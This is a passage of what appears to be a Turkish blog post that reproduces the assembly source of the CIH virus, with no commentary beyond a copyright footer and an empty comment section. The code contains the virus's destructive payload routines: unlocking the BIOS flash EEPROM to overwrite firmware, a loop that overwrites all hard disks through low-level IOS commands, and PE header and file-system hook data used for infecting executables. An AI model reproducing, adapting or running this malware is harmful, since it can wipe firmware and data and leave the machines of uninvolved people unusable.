    xchg ecx, eax
    loop $
    ; ***********************
    ; * Show and Enable the *
    ; * BIOS Main ROM Data *
    ; * 000E0000 - 000FFFFF *
    ; * ( 128 KB ) *
    ; * can be Writted... *
    ; ***********************
    mov eax, 0f5555h
    pop ecx
    mov ch, 0aah
    call ebx
    mov byte ptr [eax], 20h
    loop $
    ; ***********************
    ; * Kill the BIOS Main *
    ; * ROM Data in Memory *
    ; * 000FE000 - 000FE07F *
    ; * ( 80h Bytes ) *
    ; ***********************
    mov ah, 0e0h
    mov [eax], al
    ; ***********************
    ; * Hide BIOS Page in *
    ; * 000F0000 - 000FFFFF *
    ; * ( 64 KB ) *
    ; ***********************
    ; or al,10h
    mov word ptr (BooleanCalculateCode-[at]10)[esi], 100ch
    call esi
    ; ***************************
    ; * Kill All HardDisk *
    ; ************************************************** *
    ; * IOR Structure of IOS_SendCommand Needs *
    ; ************************************************** *
    ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
    ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
    ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
    ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
    ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
    ; ************************************************** *
    KillHardDisk:
    xor ebx, ebx
    mov bh, FirstKillHardDiskNumber
    push ebx
    sub esp, 2ch
    push 0c0001000h
    mov bh, 08h
    push ebx
    push ecx
    push ecx
    push ecx
    push 40000501h
    inc ecx
    push ecx
    push ecx
    mov esi, esp
    sub esp, 0ach
    LoopOfKillHardDisk:
    int 20h
    dd 00100004h ; VXDCall IOS_SendCommand
    cmp word ptr [esi+06h], 0017h
    je KillNextDataSection
    ChangeNextHardDisk:
    inc byte ptr [esi+4dh]
    jmp LoopOfKillHardDisk
    KillNextDataSection:
    add dword ptr [esi+10h], ebx
    mov byte ptr [esi+4dh], FirstKillHardDiskNumber
    jmp LoopOfKillHardDisk
    ; ***************************
    ; * Enable EEPROM to Write *
    ; ***************************
    EnableEEPROMToWrite:
    mov [eax], cl
    mov [ecx], al
    mov byte ptr [eax], 80h
    mov [eax], cl
    mov [ecx], al
    ret
    ; ***************************
    ; * IO for EEPROM *
    ; ***************************
    IOForEEPROM:
    [at]10 = IOForEEPROM
    xchg eax, edi
    xchg edx, ebp
    out dx, eax
    xchg eax, edi
    xchg edx, ebp
    in al, dx
    BooleanCalculateCode = $
    or al, 44h
    xchg eax, edi
    xchg edx, ebp
    out dx, eax
    xchg eax, edi
    xchg edx, ebp
    out dx, al
    ret
    ; ************************************************** *******
    ; * Static Data *
    ; ************************************************** *******
    LastVxDCallAddress = IFSMgr_Ring0_FileIO
    VxDCallAddressTable db 00h
    db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
    db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
    db IFSMgr_Ring0_FileIO-UniToBCSPath
    VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
    VxDCallTableSize = ($-VxDCallIDTable)/04h
    ; ************************************************** *******
    ; * Virus Version Copyright *
    ; ************************************************** *******
    VirusVersionCopyright db 'CIH v'
    db MajorVirusVersion+'0'
    db '.'
    db MinorVirusVersion+'0'
    db ' TTIT'
    ; ************************************************** *******
    ; * Virus Size *
    ; ************************************************** *******
    VirusSize = $
    ; + SizeOfVirusCodeSectionTableEndMark(04h)
    ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
    ; + SizeOfTheFirstVirusCodeSectionTable(04h)
    ; ************************************************** *******
    ; * Dynamic Data *
    ; ************************************************** *******
    VirusGameDataStartAddress = VirusSize
    [at]6 = VirusGameDataStartAddress
    OnBusy db 0
    FileModificationTime dd ?

    FileNameBuffer db FileNameBufferSize dup(?)
    [at]7 = FileNameBuffer

    DataBuffer = $
    [at]8 = DataBuffer
    NumberOfSections dw ?
    TimeDateStamp dd ?
    SymbolsPointer dd ?
    NumberOfSymbols dd ?
    SizeOfOptionalHeader dw ?
    _Characteristics dw ?
    Magic dw ?
    LinkerVersion dw ?
    SizeOfCode dd ?
    SizeOfInitializedData dd ?
    SizeOfUninitializedData dd ?
    AddressOfEntryPoint dd ?
    BaseOfCode dd ?
    BaseOfData dd ?
    ImageBase dd ?
    [at]9 = $
    SectionAlignment dd ?
    FileAlignment dd ?
    OperatingSystemVersion dd ?
    ImageVersion dd ?
    SubsystemVersion dd ?
    Reserved dd ?
    SizeOfImage dd ?
    SizeOfHeaders dd ?
    SizeOfImageHeaderToRead = $-NumberOfSections

    NewAddressOfEntryPoint = DataBuffer ; DWORD
    SizeOfImageHeaderToWrite = 04h

    StartOfSectionTable = [at]9
    SectionName = StartOfSectionTable ; QWORD
    VirtualSize = StartOfSectionTable+08h ; DWORD
    VirtualAddress = StartOfSectionTable+0ch ; DWORD
    SizeOfRawData = StartOfSectionTable+10h ; DWORD
    PointerToRawData = StartOfSectionTable+14h ; DWORD
    PointerToRelocations = StartOfSectionTable+18h ; DWORD
    PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
    NumberOfRelocations = StartOfSectionTable+20h ; WORD
    NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
    Characteristics = StartOfSectionTable+24h ; DWORD
    SizeOfScetionTable = Characteristics+04h-SectionName
    ; ************************************************** *******
    ; * Virus Total Need Memory *
    ; ************************************************** *******
    VirusNeedBaseMemory = $
    VirusTotalNeedMemory = [at]9
    ; + NumberOfSections(??)*SizeOfScetionTable(28h)
    ; + SizeOfVirusCodeSectionTableEndMark(04h)
    ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h)
    ; + SizeOfTheFirstVirusCodeSectionTable(04h)
    ; ************************************************** *******
    VirusGame ENDS
    END FileHeader

    0 Yorum:

    Yorum Gönder

     
    Copyright (c) 2012 Hüseyin KÜÇÜK
    Php Yazılım Uzmanı, Öğretim Teknoloğu, Toplum Gönüllüsü